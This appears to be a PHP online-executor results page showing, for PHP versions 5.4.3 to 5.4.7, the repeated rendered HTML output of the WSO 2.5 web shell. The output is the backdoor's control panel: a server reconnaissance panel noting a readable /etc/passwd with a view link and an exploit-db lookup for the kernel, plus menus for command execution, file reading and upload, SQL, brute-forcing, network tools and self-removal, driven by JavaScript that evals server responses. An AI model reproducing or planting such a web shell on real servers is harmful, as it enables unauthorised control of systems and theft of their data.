<td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.7
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.7 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.6
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.6 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.5
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.5 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.4
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.4 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.3
